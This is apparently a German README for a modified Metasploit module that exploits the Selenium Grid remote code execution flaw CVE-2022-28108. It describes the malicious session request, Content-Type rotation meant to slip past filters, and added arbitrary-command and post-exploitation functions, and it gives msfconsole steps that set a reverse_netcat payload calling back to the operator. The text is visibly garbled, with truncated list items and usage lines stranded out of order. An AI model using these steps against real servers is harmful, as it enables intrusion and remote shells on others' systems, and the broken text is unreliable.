
Dieses Repository enthält eine modifizierte Version eines Metasploit-Moduls, das eine Remote-Code-Execution-Schwachstelle in älteren Versionen von Selenium Server (Grid) ausnutzt.
Bitte lesen Sie diese README-Datei sorgfältig, bevor Sie diesen Code verwenden.
Anerkennung des Originalcodes:
Dieses Modul basiert auf der hervorragenden Arbeit der ursprünglichen Autoren des Metasploit-Moduls für CVE-2022-28108. Die Kernfunktionalität zur Ausnutzung der Selenium-Server-Schwachstelle basiert weitgehend auf deren Implementierung. Wir würdigen und schätzen ihren Beitrag zur Sicherheitsgemeinschaft.
'Author'). Bitte schauen Sie im Originalmodul nach, um ihre konkreten Namen zu erfahren.Ausgenutzte Schwachstelle:
Dieses Modul zielt auf CVE-2022-28108, eine Cross-Site Request Forgery (CSRF)-Schwachstelle in Selenium Server (Grid)-Versionen vor 4.0.0-alpha-7. Diese Schwachstelle entsteht dadurch, dass der Server für bestimmte Anfragen Nicht-JSON-Inhaltstypen (wie text/plain, application/x-www-form-urlencoded und multipart/form-data) zulässt. Ein Angreifer kann dies ausnutzen, um bösartige Anfragen zu senden, was zu Remote Code Execution (RCE) auf dem Server führt.
Wie der Originalcode funktioniert:
Das ursprüngliche Metasploit-Modul nutzt diese Schwachstelle aus, indem es eine manipulierte POST-Anfrage an den Endpunkt /wd/hub/session des verwundbaren Selenium-Servers sendet. Diese Anfrage verwendet einen Nicht-JSON-Content-Type (genauer gesagt text/plain) und enthält bösartige Konfigurationen innerhalb der goog:chromeOptions der gewünschten Browser-Fähigkeiten. Dadurch kann ein Angreifer eine beliebige Binärdatei (wie /usr/bin/python3) und Argumente angeben, die auf dem Server ausgeführt werden, wenn eine neue Browsersitzung gestartet wird.
Änderungen und Erweiterungen in dieser Version:
Dieses Repository enthält eine modifizierte Version des ursprünglichen Metasploit-Moduls. Die wichtigsten Änderungen umfassen:
Content-Type-Headern sendet. Dazu gehören text/plain, application/x-www-form-urlencoded und multipart/form-data. Dies dient dazu, grundlegende Filter- oder Erkennungsmechanismen zu umgehen, die möglicherweise nach einem bestimmten Content-Type suchen.execute_post_exploitation-Funktion: Eine neue Funktion execute_post_exploitation(session_response) wurde hinzugefügt. Diese Funktion wird nach erfolgreicher Ausnutzung aufgerufen und zielt darauf ab, grundlegende Post-Exploitation-Aufgaben durchzuführen. In der aktuellen Implementierung umfasst sie:
execute_command_on_target-Funktion: Eine weitere neue Funktion execute_command_on_target(command) wurde hinzugefügt. Diese Funktion ermöglicht die Ausführung beliebiger Befehle auf dem Zielsystem nach einem erfolgreichen Exploit. Sie wird innerhalb der -Funktion verwendet und kann für weitere Post-Exploitation-Aktivitäten erweitert werden.Hervorgehobene Hauptunterschiede:
Der Kernunterschied liegt in der exploit-Methode und der Hinzufügung der beiden neuen Funktionen.
exploit-Methode: Konzentrierte sich auf das Senden einer einzelnen Anfrage mit Content-Type: text/plain.exploit-Methode: Iteriert durch verschiedene Content-Type-Werte und versucht den Exploit mit jedem. Nach erfolgreicher Ausnutzung ruft sie die execute_post_exploitation-Funktion auf.execute_post_exploitation und execute_command_on_target sind vollständig neue Ergänzungen dieser modifizierten Version und bieten erweiterte Post-Exploitation-Fähigkeiten.So verwenden Sie das modifizierte Modul:
.rb-Datei (z. B. selenium_rce_extended.rb)./usr/share/metasploit-framework/modules/exploits/ oder ~/.msf4/modules/exploits/. Informationen zum genauen Speicherort finden Sie in Ihrer Metasploit-Installation.msfconsole aus.use exploit/selenium_rce_extended (oder den Pfad, unter dem Sie die Datei gespeichert haben, falls Sie sie in einem Unterverzeichnis abgelegt haben).msf6 exploit(selenium_rce_extended) > set RHOSTS <target_ip>
msf6 exploit(selenium_rce_extended) > set RPORT <target_port>
Wichtige Hinweise (Haftungsausschluss):
Haftungsausschluss:
Die Autoren dieses modifizierten Codes sind nicht für Missbrauch oder Schäden verantwortlich, die durch die Verwendung dieses Moduls entstehen. Durch die Verwendung dieses Codes erklären Sie sich bereit, die volle Verantwortung für Ihre Handlungen zu übernehmen.
Lizenz:
Dieser modifizierte Code unterliegt wahrscheinlich derselben Lizenz wie das ursprüngliche Metasploit Framework (in der Regel die MSF-Lizenz). Weitere Informationen finden Sie in der Lizenz des ursprünglichen Metasploit Frameworks.
Mitwirken:
Beiträge und Verbesserungen an diesem Modul sind willkommen. Sie können gerne Pull Requests mit Fehlerbehebungen, Verbesserungen oder neuen Funktionen einreichen.
Danksagungen:
Wir bekräftigen unsere Dankbarkeit gegenüber den ursprünglichen Autoren des Metasploit-Moduls für CVE-2022-28108. Ihre Arbeit bildet die Grundlage dieses modifizierten Moduls.
execute_post_exploitationmsf6 exploit(selenium_rce_extended) > set PAYLOAD cmd/unix/reverse_netcat
msf6 exploit(selenium_rce_extended) > set LHOST <your_ip>
msf6 exploit(selenium_rce_extended) > set LPORT <your_port>
exploit aus.